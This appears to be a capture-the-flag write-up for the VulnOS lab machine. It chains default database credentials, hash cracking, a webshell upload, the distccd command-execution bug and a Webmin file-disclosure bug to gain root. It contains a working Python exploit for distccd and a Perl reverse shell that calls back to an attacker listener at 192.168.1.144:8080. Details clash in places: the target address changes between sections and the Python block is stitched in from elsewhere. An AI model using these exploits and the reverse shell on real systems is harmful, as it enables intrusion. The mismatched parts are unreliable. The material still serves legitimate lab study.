==> DIRECTORY: http://192.168.1.114/phpmyadmin/themes/original/img/
==> DIRECTORY: http://192.168.1.114/phppgadmin/images/themes/default/
==> DIRECTORY: http://192.168.1.114/phppgadmin/libraries/adodb/drivers/
==> DIRECTORY: http://192.168.1.114/phppgadmin/libraries/adodb/lang/
==> DIRECTORY: http://192.168.1.114/mediawiki/skins/common/images/ar/
==> DIRECTORY: http://192.168.1.114/mediawiki/skins/common/images/de/
==> DIRECTORY: http://192.168.1.114/mediawiki/skins/common/images/fa/
==> DIRECTORY: http://192.168.1.114/mediawiki/skins/common/images/icons/
-----------------
END_TIME: Sun Feb 9 19:43:30 2020
DOWNLOADED: 212152 - FOUND: 25
The directory and file enumeration with dirb revealed applications such as phpmyadmin, phpldapadmin, mediawiki and phppgadmin running on the target under port 80/TCP. Tests against the phpmyadmin application at http://192.168.1.114/phpmyadmin reveal that the user root is using toor as password. This common credential allowed the attacker to access the databases and collect information such as password hashes and the list of installed applications.
Inside the drupal6 database, the attacker found the users' passwords; they are stored as hashes, and Drupal 6 stores an unsalted MD5 of the password.
In order to crack the drupal6 password hash, it was submitted to CrackStation (https://crackstation.net/), which returned the password in clear text.
Exploitation Part 1
The Drupal application was found at http://192.168.1.142/drupal6/ by guessing the directory. The attacker obtained administrative access to the Drupal 6 management console with the cracked password. Inside the management console, an administrator can edit the Access Control List (ACL) of safe file extensions, adding new extensions to the whitelist of files the platform accepts for upload.
After adding phtml to the ACL, the attacker is able to upload a malicious PHP file to the platform and execute remote commands, because Apache's PHP handler treats .phtml files like .php.
With the webshell placed at http://192.168.1.142/drupal6/sites/default/files/webshell.phtm, the attacker uploaded a reverse shell to the target in order to get an interactive shell. After executing the reverse shell on the target, the attacker's machine received a shell with www-data (uid 33) privileges.
Privilege Escalation Part 1
To get more privileges on the target, the attacker found the file /etc/ldap.secret, which stores a password in clear text.
A password-spraying attack against the SSH service, using that password and the usernames from the target's /etc/passwd, showed that the password canuhackme is valid for the user vulnosadmin.
With vulnosadmin's credentials, the attacker can authenticate over SSH. The user vulnosadmin has sudo privileges without any restriction on the commands it can execute, allowing the attacker to obtain administrative access on the target machine.
Exploitation Part 2
The SNMP process list reveals the distccd (https://en.wikipedia.org/wiki/Distcc) service running on the target, and the SNMP netstat shows it listening on 3632/TCP even though it did not appear in the TCP scan output above. This software contains a vulnerability (https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec) that allows the attacker to execute arbitrary commands on any system running distccd. To exploit it, the attacker used the Metasploit module exploit/unix/misc/distcc_exec. Note that distccd is started with --allow 192.168.1.1/24, so the attacking host must sit in that subnet for the daemon to accept the job.
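As an added example (not the page's code and not the Metasploit module), the Python below speaks the distcc wire protocol directly so the mechanism is visible: the job's argv is taken as the compiler command line, so naming sh -c <command> as the "compiler" runs the command with the daemon's privileges. Port 3632 is the one the SNMP netstat shows; the response bytes used for the offline check are constructed.

```python
import socket


def _tok(name: str, value) -> bytes:
    """distcc protocol token: 4-char name + 8 hex digits. An int becomes the
    number itself (version, argc, status); bytes/str become length + payload."""
    if isinstance(value, int):
        return name.encode() + f"{value:08x}".encode()
    data = value.encode() if isinstance(value, str) else value
    return name.encode() + f"{len(data):08x}".encode() + data


def build_distcc_request(command: str) -> bytes:
    """Compile job whose 'compiler' is sh -c <command>.

    distccd only checks that the argv looks like a compile (-c, a .c input,
    -o an output); it never checks that argv[0] is a real compiler. '#' becomes
    $0 for the shell so the trailing fake compiler flags are ignored.
    """
    argv = ["sh", "-c", command, "#", "-c", "main.c", "-o", "main.o"]
    msg = _tok("DIST", 1) + _tok("ARGC", len(argv))
    for arg in argv:
        msg += _tok("ARGV", arg)
    msg += _tok("DOTI", "A\n")      # the preprocessed "source" the server compiles
    return msg


def parse_distcc_response(data: bytes) -> dict:
    """Walk the reply tokens: DONE, STAT (exit code), SERR/SOUT (captured
    stderr/stdout of the 'compiler'), DOTO (object file)."""
    out, i = {}, 0
    while i + 12 <= len(data):
        name = data[i:i + 4].decode()
        val = int(data[i + 4:i + 12], 16)
        i += 12
        if name in ("SERR", "SOUT", "DOTO"):
            out[name] = data[i:i + val]
            i += val
        else:
            out[name] = val
    return out


def run_command(host: str, command: str, port: int = 3632, timeout: float = 10.0) -> dict:
    """Send the job and return the parsed reply (network call; not run offline).
    The command's stdout comes back in SOUT, so 'id' shows which account distccd runs as."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_distcc_request(command))
        chunks = []
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
    return parse_distcc_response(b"".join(chunks))


# Constructed reply, shaped like a real server's answer to `id`.
SAMPLE_RESPONSE = (_tok("DONE", 1) + _tok("STAT", 0) + _tok("SERR", "")
                   + _tok("SOUT", "uid=1(daemon) gid=1(daemon)\n") + _tok("DOTO", ""))

if __name__ == "__main__":
    print(build_distcc_request("id"))
    print(parse_distcc_response(SAMPLE_RESPONSE))
    # Live use from inside the allowed subnet: print(run_command("192.168.1.142", "id"))
```

The shell this yields belongs to whatever account distccd runs under, which is why the writeup still needs a separate privilege-escalation step afterwards.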
Privilege Escalation Part 2
It was identified that Webmin runs with root privileges (the miniserv.pl process appears in the SNMP process list, and /etc/shadow was readable through the file disclosure). Combining this with the Arbitrary File Disclosure vulnerability, it is possible to drop a CGI file on the filesystem and request it through the exploit https://www.exploit-db.com/exploits/2017: when miniserv reaches a .cgi file it executes it instead of returning its contents, and because miniserv runs as root the script runs as root. This scenario can be exploited to obtain a reverse shell with root privileges.
The CGI file was placed at /tmp/revshell.cgi using the www-data shell obtained earlier.
#!/usr/bin/perl -w
use Socket;
$i="192.168.1.144";$p=8080;   # attacker's listener address and port
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
# Connect back, point stdin/stdout/stderr at the socket and exec an interactive shell
if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};
When the Arbitrary File Disclosure path is used to reach /tmp/revshell.cgi, miniserv executes the script, which connects back to the attacker's machine with a root shell. A listener must already be waiting on 192.168.1.144:8080, the address and port hard-coded in the script.
Conclusion
This box has a lot of services running, so the enumeration and recon process needs to be very thorough to not miss anything. I found other vulnerabilities in the server, mostly related to enumeration. Of course I'm disregarding services like DVWA. I tried a lot more hacks on this box: the SSH is vulnerable to user enumeration, the SMTP is vulnerable to user enumeration. I will not report these here because I think they are not really important to own the box.
This box made me spend time, but the way we abuse the Webmin service running with root privileges is really nice; the CGI script is a really nice hack.
Resources
- CrackStation: https://crackstation.net/
- Distcc Exec: https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec
- Arbitrary File Disclosure: https://www.exploit-db.com/exploits/2017
- Distcc: https://en.wikipedia.org/wiki/Distcc
- Writeup: https://naveen194.blogspot.com/2016/10/vulnos-solution.html